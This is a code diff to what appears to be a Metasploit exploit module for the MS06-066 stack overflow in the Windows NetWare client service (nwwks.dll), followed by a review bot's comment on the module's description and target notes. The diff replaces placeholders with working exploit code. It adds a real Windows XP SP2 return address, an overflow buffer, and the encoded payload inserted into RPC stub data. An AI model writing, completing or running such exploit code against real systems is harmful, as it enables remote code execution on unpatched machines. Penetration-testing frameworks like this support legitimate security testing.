diff --git a/modules/exploits/windows/smb/ms06_066_nwwks.rb b/modules/exploits/windows/smb/ms06_066_nwwks.rb
index ca38bb5e32..513c45bc8e 100644
--- a/modules/exploits/windows/smb/ms06_066_nwwks.rb
+++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb
@@ -12,7 +12,8 @@ class Exploits::Windows::Smb::MS06_066_NWWKS < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Microsoft Services MS06-066 nwwks.dll',
 'Description' => %q{
- XXX
+ This module exploits a stack overflow in the svchost service, when the netware
+ client service is running.
 },
 'Author' => [ 'pusscat' ],
 'License' => MSF_LICENSE,
@@ -42,9 +43,9 @@ class Exploits::Windows::Smb::MS06_066_NWWKS < Msf::Exploit::Remote
 'Targets' =>
 [
 [
- 'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm
+ 'Windows XP SP2',
 {
- 'Ret' => 0x0BADB0D0, # umpnpmgr.dll
+ 'Ret' => 0x616566fb, # modemui.dll [esp + 16]: popaw, ret
 },
 ]
 ],
@@ -64,16 +65,16 @@ class Exploits::Windows::Smb::MS06_066_NWWKS < Msf::Exploit::Remote
 # [in] [unique] wchar *
 # [out] long
- ofstring = Rex::Text.to_unicode('\\\\') + "A"*292 + [ target.ret ].pack('V') + "\x00\x00"
+ ofstring = Rex::Text.to_unicode('\\\\') + Rex::Text.rand_text(292) + [ target.ret ].pack('V') + "\x00\x00"
 stubdata = NDR.long(rand(0xffffffff)) +
- NDR.UnicodeConformantVaryingString("AAAA" + "\x00") +
+ NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") +
 NDR.long(rand(0xffffffff)) +
- NDR.UnicodeConformantVaryingString("BBBB" + "\x00") +
+ NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") +
 NDR.long(rand(0xffffffff)) +
- NDR.UnicodeConformantVaryingString("CCCC" + "\x00") +
+ NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") +
 NDR.long(rand(0xffffffff)) +
- NDR.UnicodeConformantVaryingString("DDDD" + "\x00") +
+ NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") +
 NDR.UnicodeConformantVaryingStringPreBuilt(ofstring)
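Review bot: The new Description in the first hunk still does not name the vulnerable component or the bulletin that the module's Name already refers to, so a reader triaging from the description alone cannot tell which service must be present; suggest `This module exploits a stack overflow in the Client Service for NetWare (nwwks.dll), hosted in svchost.exe, addressed by Microsoft bulletin MS06-066.` The Targets hunk replaces the Windows 2000 entry with Windows XP SP2 but drops the "Tested OK" date annotation the old entry carried, so the target line or description should record how and when the new target was verified and that Windows 2000 is no longer covered. The update_info call enclosing the first two hunks starts before them and continues past them.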